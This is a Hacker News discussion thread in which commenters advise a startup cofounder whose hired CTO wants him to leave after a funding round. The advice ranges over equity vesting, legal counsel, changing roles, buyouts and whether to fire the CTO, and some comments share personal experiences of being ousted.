First thing first, just learn things you need to know fast. You will know when you are making great contributions to the company, and you want that. Don't let your CTO stops you from that. At least when you are working, don't think about the issue with him and grow fast as a coder. I suggest a conversation with him off the work time. If I were you, I would like to know if he had issues with me beyond his doubt in my tech ability.

> It is in my interest however to remain in the company because my equity is vested, the sooner I leave the less I will get in return, apart from my time, and opportunity cost I invested all my personal wealth.

Did you have cliff in your equity vesting? If so have you past the cliff period? I really don't recommend you to leave before all your cliff equity are vested, otherwise you will get next to nothing. Manage to stay with your company at least in the cliff period. Your company wouldn't make this far without you, your company owes you that, and you know through what it should pay you off? Equity. So just manage to get the credit where credit is due.


May the best luck be with you.

jonsterling 1 day ago 1 reply      
I don't know anything about business or founding a startup: but as an engineer in one, if you have hired a CTO who is better at engineering than you (kudos!) and he/she has asked you to stop writing production code, you should listen. Coding "for old times sake" is pretty damaging when a team of actually trained engineers has just got your old broken code-base under control and instituted better engineering practices. This is part of the typical startup lifecycle: the code that got you here isn't going to get you to the next place, and it's your job to find, hire and enable better engineers to get you to the next level.

But if he actually is asking you to leave the company? He can fuck himself. But seriously, if it is clear that you are hurting more than helping by writing code, please stop. Keep learning, and ease into contributing again slowly.

throwa 20 hours ago 0 replies      
Honestly, you need to get some self confidence. You need to man up. Being a nice guy in this scenario doesn't help. If the CTO wants to play dirty and ruthless. You must play dirty and ruthless. How did a guy you hire get the guts to tell you he wants to fire you as a co-founder. This means your other co-founder is probably ganging up with him behind your back. You cannot trust both of them. I don't know who owns more percentage of the company betwen you and your co-founder but I want to believe that your CTO is minority stake holder at this point. Don't leave without a thorough fight. The good thing is that you can code no-matter how terrible, you can build a minimum viable product for any future idea you have. Your CEO cannot which is why it is convenient for him to try and co-operate wit the CTO.

Line of action:

1. Start speaking to a lawyer.2. Transition out of code writing role into product visionary role, so the CTO doesn't see your as someone that reports to him. You played a part in not just formulating the initial idea but in coding a prototype, so in essence you can play the role of product visionary. That is Chief Product Officer.

3. Tell you co-founder you are transitioning into a product visionary role with the title of Chief Product Officer. Read up what this role does.

4. Call for a meeting with just you and your co-founder and test his allegiance. Tell him that if a guy you hired wants to fire you then he can also team up with future investors to fire the CEO, so he is not save in the future. So due to trust issues, you intend to fire your CTO after you get a replacement. Show him a list of possible top people in the open-source world using your technology that you intend to open up communication with as possible replacement for the CTO. Sink it into his head that the CTO is replace-able and that culture fit matters more thank skills as you can get a replacement for skillset easier than getting the person with the right skillset and cultural fit. http://www.bhorowitz.com/programming_your_culture

5. Call a meeting with your CTO and tell him you plan to stop writing code and then tell him you also plan to get a new CTO to replace him because you can't have a guy you hired steal your company. Let him know he is also replace-able as you won't have hired him because of poor culture fit even though he is skillful if you knew about the schemer he is.

6. Now that you have man up to both, call a meeting with the CEO and CTO to address any issues relating to what you discussed with them.

7. Watch the shares during any round of funding, so you are not squeezed out. See the company incorporation details and ensure your name is there and you are not deceived by your other co-founder.

8. CTO's are replace-able, don't don't let someone you hired ask you to leave, so that he can take your shares. He probably overstated his importance behind your back to the CEO and asked for more shares and your co-founder felt that if he gets you out of the way he will get the more shares.

If they were bold and ruthless, you must be bold and ruthless too.

sate your importance to founding the company, idea generation, writing enough code to make the CTO, join since he knew you people were not idea only guys.

Kick that CTO out and henceforth watch your co-founder closely.

geuis 1 day ago 1 reply      
This is your company, not the CTO's. It's time to fire him.

The ability to code really doesn't have much to do in the long run to the company success. Of the two founders at the company I work for, both could code but one hasn't in a long time and the other only does on occasion. As the team has grown, their responsibilities have shifted. Yours will too.

nashequilibrium 1 day ago 0 replies      
I really don't understand this story, most tech entrepreneurs with successful companies have to hire people better than them, mark zuckerberg, jack dorsey(especially the twitter guys), snapchat etc. You 2 guys are the founders and hired a CTO and the CTO is telling you to leave, imagine the CTO of snapchat telling Evan Spiegal who cannot code to leave, it just doesn't add up.

If i had to guess, your cofounder who is the business guy realizes that the CTO is a better coder than you and is trying to push you out and offer the CTO a better share of the company. You really need to stand up for yourself, do not limit yourself or feel inferior, i mean even Larry and Sergey had to get better programmers than them.

thejosh 1 day ago 0 replies      
"EDIT: He's not asking me to leave now, since I'm still desperately needed, but in 3-6 months time after we have raised more funding."

Means they do actually need you, the CTO is waiting for a payday before kicking you out for a higher stake. Tell the CTO to go stick it if they need you before funding but not after.

gojomo 1 day ago 0 replies      
That's tough. Your last edit gives me the most pause: if you're good enough to be "desperately needed" for this critical pre-funding period, you should be good enough for after, too.

Don't sell yourself short: simply knowing your limits is a major skill, that will let you contribute where you can, grow where you can, and defer to others where you must. Also, having been involved since the start gives knowledge and perspective that can't necessarily be hired elsewhere.

Ultimately if you want to stay -- and especially if you still have the support of your biz cofounder -- you should insist on having the chance to grow with the company, learning as you go along. And the plan for the future needs to be well understood among the principals, before the fundraising, because that process will tend to firm up roles, equity, vesting, employment agreements, etc.

It's true that sometimes a member of the founding team isn't right the commitment or skills or shared-vision isn't there, and perhaps the original title/status/equity even gets in the way of acquiring what's needed. But it sounds like you're humble and flexible enough that you should be able to retain a key role.

If you are considering leaving from, or think you might be pushed out of, a valuable position, you will likely want to consult with a lawyer, separate from the company lawyer, about how to best protect your rights. (The fundraising process itself, and getting the whole company/team into "standard" documents, could either work to your advantage, or make it very easy for you to be booted with very little, so educate yourself early, to avoid signing away anything valuable.)

If intimidated by the idea of talking to a lawyer, remember that many will give a free 30-60 minute initial consultation, so simply by the act of shopping around, always improving your 'executive summary' of your situation before each discussion, you'll learn a ton at no cost. (No two lawyers will have the exact same analysis, so the 5th or 10th you talk to may still improve your understanding.) And if you find someone you like, they may give you quite a bit of continuing good advice simply in return for the future-chance/option-value of representing you in a future dispute.

balls187 1 day ago 0 replies      
This is your company. Not the CTO's.

It's time to have a frank discussion with your co-founder and decide what is best for you and for the company.

It may ultimately be best for you to step down, but it shouldn't ever be because of your technical abilities, and it shouldn't be because the CTO believes you should.

There are lots of things you can be doing, and the fact that you CAN code (even if it's not high level) is huge.

There is testing, blogging, social networking posts, Google Analytics, SEO/SEM, recruiting, buying office supplies, soda runs, customer outreach, marketing, more testing, design, investor outreach, product management, program management.

You have so much that you can do, that unless you are a liability (past convictions by the SEC), or so caustic that you are the direct cause for the companies failures, that you still have an important role at your company for many years to come.

And if you do stay, it's time to put the CTO on notice, the CTO works for you.

marknutter 1 day ago 0 replies      
Uh, you are a founder. Nobody asks you to leave. You took part of the risk to start the company, the new CTO did not. He does not get to tell you to leave. Ever. Period. I'm actually shocked that you're even considering it.
hansy 1 day ago 0 replies      
Provided you're not writing anything that detrimentally impacts the product, there's no reason for you to leave. It's your company.

Now I say this not so you can sit back and let others do the hard work, but for you to figure out how else you can contribute. Every startup, hell every mature company, has issues to deal with on a daily basis. I would be very surprised if there wasn't something else you could be doing for the company.

Worst comes to worst, your job from here on out is to do the tasks nobody else wants to do. From a technical perspective that could mean things like sanitizing the database (if it needs it) or going back and writing some good tests for already-implemented code. From a business perspective, this could mean researching, scraping, generating leads to customers, users, etc. Hell, you can even be the glorified secretary by helping others manage their day-to-day tasks, schedules, appointments. Be the office janitor. Be the guy they send to campus events to talk to students.

If you can no longer contribute to the code for your product, that's OK. There's a million and one things you can do outside that realm to support the product as well as your teammates.

Of course you can always buckle down on your coding game and get better at it. Take online courses. If you (and your company) can afford the time and money, go to one of those schools that teach you to be a better programmer. Tell your CTO that you want to get better and want to learn from him/her.

Be the glue that holds everyone together. Be the swing man that can bounce from activity to activity and ensure everything is running smoothly. Be the founder who's relentlessly resourceful and continues to move the company forward in any shape or form.

WoodenChair 1 day ago 0 replies      
Let's assume that what the CTO says is true: you're not a good enough coder that you're any longer needed on a day-to-day basis in a few months. You're still a cofounder and I assume owner of quite a bit of equity of this company. Can't you talk to your other co-founder and find a different role for you on a day to day basis so that your stock still vests?

Or is this all about money/power? Is the new CTO threatened by you for some reason or trying to consolidate his power? Does the new CTO just not like you?

If you and your other co-founder are even remotely close, you guys need to talk. Sit down and figure out what other roles work for you at the company. Perhaps you will need to move out of management and become something like a "developer evangelist" or "head of support". Anything to keep vesting, right?

dvirsky 13 hours ago 0 replies      
I was once offered the job like this CTO, taking over from a less experienced co-founder, with his consent, while he remains in place. I didn't take the job for other reasons, but I would never have done what this guy is doing to you. And if I had, the CEO would probably fire me.

If you were really that bad, your co-founder CEO should have parted ways with you already. But of course you're not - just the fact that you are aware of your limitations and learning as you go, is evidence of that. I've seen bad technical co-founders, and they are NOT aware of their limitations usually, or don't care about it. And BTW for the quick-n-dirty prototype part of a start-up's life cycle, having crap code is perfectly fine IMHO - as long as you're aware of it and it's a conscious decision.

But if that really is the case (and I doubt it) - and it's for the greater good of the company that you will be fired - you should be very well compensated for your time and effort, as other have mentioned. I've actually seen another situation at a start-up where this was in fact the case, and the company was better off firing a co-founder. It was painful but he was compensated and got to keep most of his shares, so it was probably for his interest as well (though I'm not sure he realized it at the time).

webwright 9 hours ago 0 replies      
Founder shuffling is not uncommon. Founders aren't always (or even often) great managers, leaders, or recruiters-- which is what you need to transition into if you're going to stay with the company. I'd encourage you to try to put yourself in their shoes. It doesn't feel fair for you, but if a co-founder who owned a huge vesting stake in the company didn't grow/perform like you'd hoped, would you want to negotiate their exit? Or would you keep them on out of loyalty, knowing that it hurt the company's recruiting efforts, culture, and chances of success?

It sounds like you've raised money, have a business co-founder, and have some other employees. All of those people are (rightfully) should be asking what's best for the company. Hopefully you are too. If the stock you're vesting (hopefully you have vesting schedule!) is outsized compared to the value you bring to the company, you need to fix the problem.

I'd ask your co-founder for their thoughts and (potentially) I'd ask your investors. Unless the CTO is going rogue, he's probably already got support on both of these fronts, which means you can't really do much other than make a scene and/or sue if they want to show you the door, which will damage your company, your stock in it, and your soul. No fun.

Assuming your co-founder agrees with the CTO (likely), options:

1) Say you love the company, don't want to leave, but acknowledge there is a problem with your compensation/value ratio. Negotiate to an agreeable role and pile of stock with the caveat that if you can prove yourself invaluable, you'd like to be able to come back to the table. If they push back, saying you aren't good enough, ask for a 3-6 month trial period to prove your mettle. Bust ass and become indispensable.

2) Leave gracefully, with a negotiated severance/stock package (know that they can dilute you and there are ways they can wipe you out at inopportune times: http://www.geekwire.com/2014/redfins-first-cto-shocked-surpr... )... But unless they are bad actors, you'll get a nice payday if there's even liquidity.

3) Pitch a fit. You'll lose this fight unless you guys botched the company setup or you have allies among the investors. This will hurt the company a lot and it's a bad path.

Good luck and (above all) congratulations for being instrumental in creating a viable company!

headhuntermdk 1 day ago 0 replies      
It's your company.. If your CTO is approaching you like that, send him packing with a pink slip. Do not pass go, do not collect $200.

There is a hell of lot more to building a company than just code and if he can talk to you any way he wants to without any consequences, then you have truly lost.

As others have said, you are supposed to hire people better than you, but that doesn't mean you have to take shit from them either.

Bottom line is don't be a doormat and be prepared to put "boot to ass" if necessary.

Good luck

wisty 20 hours ago 0 replies      
You'd make a better CTO than him. I'd rather work for a CTO who listens to good advice than one who is really sharp, but fucks people over.

Obviously, you are fairly technically competent (or he wouldn't need you around, and you wouldn't have gotten the prototype working). You're also a competent leader - you are listening to technical advice.

But let's say you hire a few more good coders. The CTO feels threatened. Is he going to listen to them when they challenge him, and possibly even step aside if one of them would be a better CTO, or is he going to fuck them over the same way he's fucking you over?

He sounds like a toxic political player. You can think "He's a snake, but he's our snake. His political skills will give us an edge", but it rarely works that way.

If you can, get rid of him, promote yourself to COO, and make the other good programmer CTO or lead programmer or something.

spidaman 12 hours ago 0 replies      
I'm surprised at all of the responses calling for the CTO to be fired. It's very common to have founders who are very good at the very early stage but lack the experience to scale the technology, the team, the culture and the business.

Ask yourself these questions:* Are the CEO cofound and CTO in cahoots, engaged in a malicious equity grab? If so, you chose partners poorly, move on post-funding. If not, then there's probably something important to listen to here. Then ask:* Are your technical and project execution chops going to take the company to the next level of technical, organizational and business scale? If so, you chose a CTO poorly and your CEO co-founder is a fool, move on post-posting. If not, then you have another choice:* Are there other ways you can help the technology, organization and business grow? If so, discuss that transition instead of an exit. Otherwise, be grateful for the lessons learned and move on post-funding.

In all of the "move on" cases, assess that your equity position is aligned with your contribution to where the company will be when it's ultimately profitable or liquid. If it's still very early stage, that proportion may be very small but it will be better to have a small bit of something successful that a large portion of a failed company.

Set aside ego, consult an attorney (as advised elsewhere), don't engage in scorched earth and figure out if these are people you want to continue working with, you can contribute getting the company to the next level and if so, in what role.

the_cat_kittles 1 day ago 1 reply      
It is REALLY stupid to tell someone you want them to leave in 3 months. Why not wait until three months have gone by? My totally uninformed guess is there is some kind of long game / ego thing at play besides just actually ability to contribute. Don't feel ashamed that you aren't the alpha tech. If you are trying your hardest, and especially as a cofounder, you would be more than welcome at any company I have ever worked at.
benologist 1 day ago 0 replies      
Tell him if he'd like a different boss he should work for a different company. It's your company, he's your employee, and he shouldn't have taken the job if he didn't want to work with and for you, and he's not the right person for the job if he can't.
Paddywack 23 hours ago 1 reply      
I had something like this happen to me (on a larger scale) - I folded, and regretted it for years.

Firstly - go straight to see a lawyer. Do not consider anything else before you have done this. Play hard, don't blink!

Secondly. If things don't go your way, play the long game and take your time. Make sure that they know that this will not be resolved quickly, and that having this hanging over them will frustrate their attempts to raise capital.

Behind the scenes this is what I think is going on:

1) The CTO is more experienced, and thinks he is entitled to more than you as a result (you seem to agree that you are relatively inexperienced). He cares little about loyalty and honour as he was not there to see you slogging it out in the early days.

2) What you have set up must be worthwhile and be starting to get valuable, otherwise you would not have attracted a "good" CTO.

3) My thoughts are this is part of the play to attract equity:

- They probably don't want to dilute too much, so would love to grab your shares back before the deal so that they can neaten things out for the new investor

- They probably want the new deal to include shares for the CTO. He is probably niggling for this, and the CEO would prefer to take yours than dilute his.

- They want to put forward a team that has the most value for fund raising. They want solid credentials, and probably feel that yours don't fit the bill.

Good luck hey!

DigitalSea 20 hours ago 0 replies      
Maybe he is telling you the truth, but you are a founder, he is a CTO. Maybe it is just a simple case if you are currently contributing code to the idea to step back and let this other guy handle the coding aspect for you. Maybe you can better spend your time as a co-founder elsewhere in your company.

Having said that, if he is forcefully advising you to leave, he is overstepping his boundaries and you need to contain that fire now before he starts turning other employees against you. A toxic employee in a company is like a cancer, it will start in one area and if not treated, it will spread throughout every orifice in your body until it kills you.

If it is a simple matter of you're making it hard for the CTO to do his job because you're committing code and continually breaking things, maybe you need to step back and let him do his job. He can't force you out of your own company, but he might have enough collateral (if he is truly instrumental in your company's success) to get other people to listen to him and force them to make a decision. The CTO is either brutally honest, he's an asshole or he's gunning for your spot in the company.

I would be looking at this from all angles. Don't just assume the CTO is acting alone, for all you know the CEO or your business part is instrumental in his push for you to leave. You're not just an employee, you're a co-founder and you have rights and responsibilities. You're acting like the CTO has already one which will be your downfall. Exercise your rights as a co-founder to fix this.

I would seriously fire the CTO. He might have been instrumental in the companies success, but he has overstepped the line. He has gone beyond the point of merely telling someone they're making his job hard, he's asking a co-founder to leave. It's like some manager at Microsoft asking the CEO to step-down, it's just crazy.

Get legal advice ASAP. Explore your options, but without-a-doubt, get legal counsel right away before you do anything else. My first question to your lawyer would be: Can I fire the CTO cleanly without recourse?

Im_Talking 54 minutes ago 0 replies      
Sounds like this CTO will have more support than you. Time to move on.

Don't understand why everyone is talking lawyers. I'm sure that you have an equity stake which value will be helped by this new CTO. If you have no equity and (as you say) are a founder, then you are out-of-luck and no legal magic can solve this. Move on and leave on good terms. You never know.

cmapes 21 hours ago 0 replies      
The biggest question is what was you and your co-founders' legal agreement in the bylaws/operating agreements regarding equity given in exchange for assigning your IP (earlier code hackery) to the entity?

If you don't have any sort of a defined equity arrangement in legal contracts, then you have a problem. It's time to speak with an attorney.

If you have some sort of share vesting schedule which will grant you an equity ownership percentage that you consider "fair" then you should consider moving from your current operational position as a software engineer to somewhere else if you want to stay in operations. Otherwise you can sit it out, keep your equity, and participate at the board level.

There will be lots of advice to just "forget about it and walk away". I believe the advice to essentially just "sit back and take it" to be idiotic. If your original positioning on the team was to be "the guy who programs the first iteration of the software that gets us to market" and you failed at that, I can understand where they're trying to push you out as a co-founder. You essentially were a technical co-founder who only partially fulfilled his/her original promise. No offence. In their eyes, you misrepresented yourself, even if that's untrue because they scope-creeped way past your skill level. But the fact is that there WAS some weight that was pulled by you. So you deserve at least partial compensation, whether or not its in the form of equity (if this was promised to you) or payment, or both.

There's some important variables here that have't been covered (mainly current legal agreements) but the main point I'd drive home is stand up for yourself and don't allow yourself to get power played. Yes the situation is sour, but you should be able to get the rest of your founders to agree that you DID contribute something, (as evidenced by the fact that the CTO wants you to leave in the future, not now) so you deserve some equity/payment even if you end up just leaving with it and participating in a liquidity event in the future.

TL;DR If no legal agreements: attorney. If legal agreements w/vague equity terms: attorney. If legal agreements w/ defined equity program you can live with: leave operations, participate at the board level, get bought out at a premium, or just hold equity and wait for a liquidity event.

Make sure there's some restrictions keeping the board from authorizing 1000000000000000 shares and diluting you out too. Good luck!

sergiotapia 1 day ago 0 replies      
I'd immediately fire the guy. He works for you not the other way around. You are the co-founder, the big kahuna - not some engineer they hired along the way. Fire his pompous ass.
zaidf 1 day ago 0 replies      
The CTO can ask you to improve your coding or to stop coding, afterall he was retained to make those calls. But he cannot ask you to leave the company if you are a proper cofounder. The only person who is in any position to make a request like that is your cofounder or your Board.
linohh 1 day ago 0 replies      
A good CTO would help you improving. I know it's stupid to make assumptions, but I'd assume he's trying to manipulate himself into higher equity in an early stage. Telling someone that he's about to be let go is poison motivation-wise. He may be trying to reduce your performance so he can use your declined output against you.
peteforde 21 hours ago 0 replies      
I think you need to be realistic: this situation has gone toxic and it's not likely that you're going to be involved in a few months time. Once you have internalized this and you're still breathing, it will become easier to see the positives.

As others have said, it's highly likely that the CTO and CEO are working together on this. The best thing you can do is - with the assistance of your lawyer - extract yourself as quickly and cleanly as you can manage. Try not to burn bridges; legitimately hope that they succeed. After all, you will retain a substantial percentage of the company.

I can't know the details but from the way you describe the situation, I'm somewhat empathetic to the position that the CTO finds himself in. Your only claim to power is that you were there at the beginning. While that's not a small detail, it's often true that the people who are vitally important to a company in the beginning end up being minor players in the future. See: Craig Newmark or the early support reps at eBay.

In short: you're a founder who is probably no longer playing an irreplaceable role in your company. The CTO wants a meritocracy, and when you're a small team shooting for growth, a founder with just enough tech chops to be a distraction is a major source of risk. To this end, I am surprised that they didn't give you notice already.

I don't say any of this to be mean, it's just that these relationships are hard and most people let awkwardness keep them from telling the hard truth.

overgard 9 hours ago 0 replies      
I suppose I'm not clear on the power structure of your company, but to me that seems incredibly insubordinate and I would fire him immediately.

On the other hand, the fact that you're even asking this makes me think you might be too passive of a person to really be in a leadership role. (I don't mean that to be harsh, but you have to be honest with yourself about who you are).

mefistofele 1 day ago 1 reply      
This "enterprise grade" terminology is suspicious. Did this CTO come up with that as a way to sell his value?

Too often in our industry the word "enterprise" is a smokescreen. Did he bring some real value to the table in terms of what the customer is seeing, or just some basic good development practices sprinkled with magic "enterprise" fairy dust?

Regardless, I have to agree with the other commenters. This guy is not your friend, he is not being straight with you, and he is not looking out for your interests. He could be a massive sociopath asshole, or maybe just an aggressive alpha nerd who doesn't know how to deal with personal problems.

Make sure you're protected. Your equity and your relationship with your cofounder are the two most important things to get covered against this guy, in that order.

tpae 1 day ago 0 replies      
If you are a founder:

- Are you needed?

   - yes: then stay.   - no: Do founders hate me?     - yes: get the legal stuff ready, leave with compensation.     - no: Do you have future plans for contribution?       - yes: then get to work!       - no: Do you like your job?         - yes: then get back to work, make contributions.         - no: then why are you asking this question?
I also think that having a CTO does not mean there can't be a technical founder. You can find other things to do, such as build product roadmaps, and with basic technical understanding, you could make positive contributions, not through lines of code, but through the bigger picture.

Reading your post sounds like you don't have self confidence, but you got to find your edge! It doesn't have to be coding. There's more to a startup than lines of code, and if you were there since Day 1, you've already done much more for the company than the CTO. Feel better about yourself, and take a pivot on your perspectives.

throawaycofnder 18 hours ago 1 reply      
Throwaway here.

I too (like Bluestrike2) was squeezed out of the company I co-founded. I know what its like. And I want to help.

In my situation, I didn't get 3-6 months notice.

There was a "difference of opinion" about the value of work I was putting into the business, and a "difference of opinion" about where the business should go strategically, and one Tuesday morning I entered a grim meeting where I was given an exit contract to consider.

It was a bit of a shock - and they kindly offered me a few days to think about it, letting me go home to cry.

How very kind of them...

...I realised the next day that it was to get me out of the building without incident - and that they'd already begun changing passwords (including my work email password) in the meeting, and continued the rest of the day.

How humiliating

The situation youre in sucks.

For what it's worth (and I say this sincerely), I'm so fucking sorry.

They're assholes. You don't deserve this. And the company never would have got to where it is today without your contribution - and how dare they use the foundation you built (your baby) to screw you.

Then they have the gall to act as if youre "not good enough".

Fuck them.

Youre awesome. Youve done some cool shit. And - as great as the project is youre working on now - I would sincerely hope that it wasnt going to be the crowning achievement of your lifetime. Im absolutely certain that the best for you is yet to come.

I could tell you how good things are going to be in the future, and you probably wouldn't believe me.

I could tell you that the lessons you learn now about control, shareholdership, business politics and more will save you later when friends and colleagues are learning the lessons themselves.

But both of these are cold comfort.

Realistically things are going to get harder for a while (finances, life direction, self confidence, etc), but in a few years as these things get back on track you'll know yourself better, be doing something you love more, and will be much wiser as a result of what you're doing right now.

Now... Let's focus on the next few weeks.

Firstly, ignore the posturing and politics in this thread about whether or not the CTO overstepped his bounds. Realistically, if he has the CEO on-side, it doesnt matter.

Feel free to get up on your high horse about this if you need to, or if it makes you feel better. Or you could wear funny hats. Or do something else equally useless.

When youre ready to do something productive, lets keep going.

cheetahtech 1 day ago 0 replies      
I say tell him to fuck off. No offense to him or you, but if your willing to keep learning code, then say no and don't look back.

The great thing about being human is our ability to learn. If your willing to learn, then there is nothing to argue about. You want to keep doing this and that is that. It took me 7 years to get where I am now, but I believe I am excellent at coding, where I didn't know anything 7 years ago. So if your willing, tell him to back the f off.

mgolawala 1 day ago 0 replies      
He has overstepped his boundaries. The CTO works for the founders, he cannot really fire you (asking you to leave is just a polite war of phrasing it). Remind him that it is the duty of any smart manager to hire people who are smarter than him. That is what you did.

My guess is that your position with your cofounder is rather weak at the moment. The cofounder is probably stepping back and saying "This CTO guy knows what he is doing and if I have to choose, I would much rather go with him". That is a tough situation to be in. If that is true, it isn't your CTO firing you (he is just the front man), it is your cofounder. In fact, ONLY your cofounder can fire you (or your investors if you have sold them a big enough share).

jeffdavis 20 hours ago 0 replies      
[Not an expert here, just offering another perspective.]

First of all, the CTO telling you he wouldn't hire you at the company you founded is [can't find a polite term]. It's reasonable to say something specific about you is subpar (like coding), and even that you wouldn't fit in a certain role he's planning to define (like full-time coder).

But this is (partially) your company, and an "experienced" CTO came to you because he saw something there. Unless your other partners did all the useful work, you've got some real value -- don't sell yourself short.

There are a lot of options here and you can really make the path for yourself. What is great about you that helped make the company into something? What kind of a role would allow those capabilities to flourish? You could call yourself a Chief Product Officer and say that you have control over what gets delivered and when, what directions the product will take, etc. (not sure if that's what a CPO does, but it doesn't matter).

If you are still inspired to go forward with this startup, and you see such a role for yourself, go make that case. For example, tell the CTO and the CEO that you intend to shed your coding responsibilities as the CTO builds that organization, and get them excited about what you can do as CPO (or whatever). Demand real responsibilities and control, and say that you have the best understanding of the product and the best vision for the future. You could end up much more influential than the CTO, who might end up just being responsible for delivering on your visions. Their whole perspective of you might change, and they might get behind you.

If you've lost inspiration, then probably a buyout makes sense. Again, don't sell yourself short -- you helped get the company this far, and did something right. Considering the risk you took, and probably low pay, it seems fair to get about 2X a fully-loaded engineer's cost for the time you were working full-time there. If your company is doing well maybe significantly more (again, not an expert, just a gut feel).

doktrin 10 hours ago 0 replies      
One of the privileges of being a founder is that employees don't get to tell you when to "leave".

It's your company. Consult an attorney and stand up for yourself.

jf22 1 day ago 1 reply      
I have no idea why people are actually recommending moving on.

You not only own part of the company but can use this experience to grow both technically and professionally.

Don't waste the chance to learn more than you ever could.

Are you taking a salary?

I don't see how you could contribute negatively to the company if you are at least somewhat productive and know the domain.

kevinpet 21 hours ago 0 replies      
Consider the possibility that he's right. The best thing for the company may be that you stop writing code. There also may not be another place for you at the company. Most of the posters seem to assume that whoever posts to HN first is the visionary genius without whom the company will fail. Maybe you're the guy who had the good idea and got it off the ground, but not the best one to make it production ready.

You may want to move into a product management role or you may want to leave. Regardless of what you think is going to happen, you need to clear up all vagueness around your equity and ensure you are going to keep your stake if you leave. You need to review your paperwork and probably talk to a lawyer.

chrisbennet 1 day ago 0 replies      
I wonder how your co-founder will feel when the VC's ask him to leave because he's "just not what the company needs at this time"?

Whose company is this, you and your co-founder's or the CTO's?

lnanek2 12 hours ago 0 replies      
Keep in mind there is a strong conflict of interest. The business guys love to squeeze out the tech after launch or before a funding round to keep a bigger slice of the pie. Often they won't say that's why they are doing it, but bizarre things will happen like they'll promise to do things then not do them just to start a fight, etc..

I used to work for a startup called WorkSmart Labs. They got Google Ventures funding, but when they knew it would close they go me to agree to take a lot more vesting equity for several months. In exchange they were supposed to help with some things to help my wife's green card process - changing addresses I was taxed and paid at to a joint residence, joint health insurance, etc.. They were happy to pay me less cash, never did the paperwork they promised, and ditched me right when the deal closed so the unvested equity was worthless.

You should watch out for similar very dirty behavior. I don't know if you are in SV, but we hear people all the time talking about things like writing every single line of code for the product, then getting kicked out after funding.

jwatte 8 hours ago 0 replies      
Just like a founder is often not the best runtime CEO, a founder is often not the best programmer."A few months" is short of the required experience for a senior software engineer by an order of magnitude. Engineers without experience cause debt that makes the code cost more to maintain over time. All of this is true.

Why did you start up in the first place? To change the world, or to have a place to hang out, or to learn things? Is there another place you can do that better now, at less cost?

Either find a niche where you are creating significant value in the current state of things, or get out to make room. Ask for a negotiated agreement with accelerated vesting of your options if you're not already owning.

vayarajesh 17 hours ago 0 replies      
The CTO has surely overstepped the boundaries.. the project/company is your baby and no one and i mean NO ONE should tell you to leave your baby.. the CTO is just like a 'hired' babysitter for your baby (you want to ensure that your baby is growing in a good and right direction) and you might lack some parenting skills but that doesnt mean you have to give up your baby in the hands of the babysitter.

Even though you may not be a great coder you can and will grow to be one great coder.

CTO should know this clearly that this company is yours and he is just an hired help.. he may be the best CTO out there in the world.. but he cannot even suggest you to leave the company..

mikekij 8 hours ago 0 replies      
Definitely sounds like poor communication between founders.

As an aside, I've been the founding CEO of a company that raised money and was acquired. I think my gifts make me really effective in running a company from idea stage to first revenue. I'm likely not the right person to run that company once there are 1000 employees. I'm fine with that

I don't think there's anything wrong with the exec team asking you to scale back your contributions if your skill set no longer matches the needs of the company. It just sounds like your partners chose a shitty way to go about it.

nickthemagicman 1 day ago 0 replies      
I hope as a cofounder you signed contracts and have equity.
camus2 1 day ago 2 replies      
You founded the company,doesnt matter how bad you are at coding there is more to running a company than coding skills.

I'd fire the CTO,no matter how good he is,you're the boss,he is merely an adviser,he shouldnt be talking to you like that. What matters in business is loyalty, not skills.You'll learn it soon enough.

throwaway_again 22 hours ago 0 replies      
I've been where you are right now. (But so has Eduardo Saverin, for whatever that's worth, and I'm no Eduardo Saverin. More accurately, the company I co-founded was no Facebook.) I launched something with two good friends in May 2010, got ousted in November 2011, and have watched the damn thing flourish, predictably, ever since... Here's what I think I learned from that experience:

First, you're asking the wrong question. Whether CTO Boy has "a point," and/or is within "boundaries" (whatever that means) is just self-inflicted misdirection. Reflect on these questions later. For now, the important thing is to make sure that you aren't haunted by doubts over whether you were fairly treated, so that your ability to learn and grow from this experience isn't hopelessly tainted by acrimony and distrust.

Second, recognize that once you've lost the confidence of your co-founder(s), for whatever reason(s), it's best to let them go. It's a free world, or at least it ought to be, and nobody should have to work with anybody they don't want to. That being said, your stake as a founder is worth something, and if the others want to take the operation over for themselves, they need to buy you out at a fair price. Regardless of whether you're a 23-year-old n00b or if you're Marc Andreesen (-- say, wasn't he 23 when... never mind --) what you need to be doing right now is tapping every available resource -- every mentor, teacher, counselor, former manager, and experienced friend -- for an outside perspective. Hate to say it, but HN doesn't count. We don't know enough about your business to really understand your situation or know how to respond to it.

Third, don't undermine your short-term position with free concessions. If they intend to cut you loose, but nonetheless can't survive without your help for the next 3-6 more months, that sounds like value that you're uniquely qualified to supply, and if they want you to forego the long-term returns on that investment, they need to compensate you for that in the short term. So, DO consult with an attorney and/or a seasoned entrepeneur to make sure you're not getting screwed.

All that being said, if you can manage to let your co-founders go their own way while being neither a dick nor a pushover, the community will respect you for it further on up the road.

Good luck.

robertschultz 3 hours ago 0 replies      
Agreeing with everyone here. He has definitely overstepped the line and he is not acting like a true CTO. Part of his job is to ensure he instills a high level of trust and support with the team in addition to the rest of his role. Assuming you're an overall good guy, he should do what he can to ensure you stay as part of the company you helped build, be it bad code or not. And if things are not working out, at least provide the path of what you need to do to make it better as the clause. But either way, it sounds like he's just being an ass with an ego.
sandGorgon 1 day ago 2 replies      
Sorry to barge in on this thread - but I have a question that turns this on its head.

Let's say you are a brilliant CTO/cofounder, but you are already doing something. Now you had this idea (or someone else had this idea) ... and you want to set them up for seed/series-A round and then you want to leave. assumption - you trust the CEO to not screw you.

How do you structure your equity compensation so that you have some benefit after 5 years? One of the thoughts I had was to show the short-term CTO as an investor with vested stock (in return for some negligible investment ... say 100$). Does this protect you from future investor rounds ?

mintykeen 1 day ago 0 replies      
Wow, that's tough. I have heard that when a biz scales, sometimes the early employees don't fit as well, because the skills needed are different than when first starting out. To get things going you do a lot of everything, and later they need specialists. How passionate are you about this startup? What does your co-founder think? You would think there could be some role you could fit into, maybe COO? Depending on its success I would hold your ground , or they should be willing to buy you out or something. Best wishes!
mikekij 11 hours ago 0 replies      
This may be an unpopular sentiment, but I would do three things:

1) Hire an attorney to make sure your equity is safe2) Negotiate for an above-market-rate consulting engagement that will continue to pay your bills in return for ~!0 hours a week of consulting and...3) Start something else.

You have a unique skill set that allows you to start company that go on to raise money, generate revenue, and hire people. This is waaay more valuable than your ability to write code at a growth company.

Just my thoughts.

hollerith 20 hours ago 0 replies      
